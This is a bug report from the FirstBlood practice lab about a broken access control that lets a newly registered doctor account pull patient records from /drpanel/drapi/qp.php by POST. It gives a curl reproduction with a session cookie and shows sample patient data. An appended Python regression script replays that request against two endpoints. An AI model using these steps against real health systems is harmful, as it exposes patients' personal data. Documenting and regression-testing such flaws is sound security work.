FirstBlood-#918 — A normal doctor still can access /drpanel/drapi/qp.php and search patients via a POST request
This issue was discovered on FirstBlood v2
On 2021-10-30, panya Level 7 reported:
Steps to reproduce:
- Register a doctor (e.g. with name test and test as an invitation code).
- Login as the doctor with the credentials provided at step 1.
- Copy the drps cookie session value (d8e66390655b44c158fac363a in our case) and paste it in a request like this:
curl -X POST 'https://73ba26106566-panya.a.firstbloodhackers.com/drpanel/drapi/qp.php' -H 'Cookie: drps=d8e66390655b44c158fac363a' -d 'name=a'
Actual result:
This information about patients will be displayed:
Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Jane Hugo<br>Address: Office 310, 83, Baker St, London, W1U 6AG<br>Telephone: 020 7034 7011<br>DOB: 05/07/1989<hr>Name: Melissa White<br>Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT<br>Telephone: 07796 985353<br>DOB: 02/01/1992<hr>
Expected result:
A newly created doctor should not be allowed to use the /drpanel/drapi/qp.php endpoint to search patient information.
P3 Medium
Endpoint: /drpanel/drapi/qp.php
Parameter: name
Payload: a
FirstBlood ID: 40
Vulnerability Type: Application/Business Logic
The endpoint qp.php used to respond to GET requests, and it should only allow administrators to query for patient information; however, the developers only fixed the bug partially and it still allowed doctors to query for patient information. query.php is related to this file and in v1 allowed both doctors and admins, but query.php was fixed completely whereas qp.php was not.
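The report's reproduction steps and the note above describe two sibling endpoints, one fixed and one not. The script below is an added example (not part of the report, the triage note, or the FirstBlood code base) that turns the manual steps into a regression check: it replays the POST from the report against both qp.php and query.php with a doctor's drps session and decides from the response body whether patient records came back. The record format (fields separated by `<br>`, records by `<hr>`) is taken from the output quoted in the report; the sample body is constructed from a subset of that output so the parser can be exercised offline. The hostname, cookie value, and the assumption that query.php accepts the same `name` parameter over POST are assumptions for illustration.

```python
"""Regression check for FirstBlood-#918 (added example, not the report's or project's code).

Offline: parses a constructed sample of the response quoted in the report.
Live:    python3 check_qp.py <host> <drps-cookie-value>
"""
import html
import sys
import urllib.error
import urllib.parse
import urllib.request

# Both endpoints mentioned on the page. query.php is assumed (not confirmed by
# the report) to take the same POST 'name' parameter; it is re-checked so a
# regression in the fixed sibling is caught as well.
ENDPOINTS = ("/drpanel/drapi/qp.php", "/drpanel/drapi/query.php")

# Constructed from a subset of the response body quoted in the report.
SAMPLE_BODY = (
    "Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>"
    "Telephone: 01394 389182<br>DOB: 13/03/37<hr>"
    "Name: Jane Hugo<br>Address: Office 310, 83, Baker St, London, W1U 6AG<br>"
    "Telephone: 020 7034 7011<br>DOB: 05/07/1989<hr>"
)


def parse_patient_records(body):
    """Split the <hr>-separated, <br>-delimited 'Key: value' body into dicts.

    Chunks without a Name field (e.g. an empty trailer after the last <hr>,
    or an error page) are ignored rather than counted as records.
    """
    records = []
    for chunk in body.split("<hr>"):
        fields = {}
        for line in chunk.split("<br>"):
            if ":" not in line:
                continue
            key, _, value = line.partition(":")
            fields[key.strip()] = html.unescape(value.strip())
        if "Name" in fields:
            records.append(fields)
    return records


def leaks_patient_data(body):
    """True when the response body carries at least one patient record."""
    return len(parse_patient_records(body)) > 0


def fetch(host, endpoint, drps, name="a"):
    """Replay the report's request: POST name=<value> with only the drps cookie.

    A 403 or other HTTP error is returned as (status, body) rather than raised,
    because an access-denied page is the expected outcome for a doctor.
    """
    data = urllib.parse.urlencode({"name": name}).encode()
    req = urllib.request.Request(
        f"https://{host}{endpoint}",
        data=data,
        method="POST",
        headers={
            "Cookie": f"drps={drps}",
            "Content-Type": "application/x-www-form-urlencoded",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_endpoints(host, drps, fetcher=fetch):
    """Return {endpoint: True if a doctor session gets patient data, False if
    not, None if the endpoint could not be reached}."""
    results = {}
    for endpoint in ENDPOINTS:
        try:
            _status, body = fetcher(host, endpoint, drps)
        except (urllib.error.URLError, OSError):
            results[endpoint] = None
            continue
        results[endpoint] = leaks_patient_data(body)
    return results


if __name__ == "__main__":
    if len(sys.argv) == 3:
        for endpoint, leaked in check_endpoints(sys.argv[1], sys.argv[2]).items():
            verdict = {True: "FAIL: patient data returned to a doctor session",
                       False: "ok", None: "unreachable"}[leaked]
            print(f"{endpoint}: {verdict}")
    else:
        for record in parse_patient_records(SAMPLE_BODY):
            print(record)
```

The live mode needs only a freshly registered doctor's drps value, as in the report's steps; any endpoint reported as FAIL is serving patient records to a non-administrator, which is exactly the partially fixed behaviour the note describes.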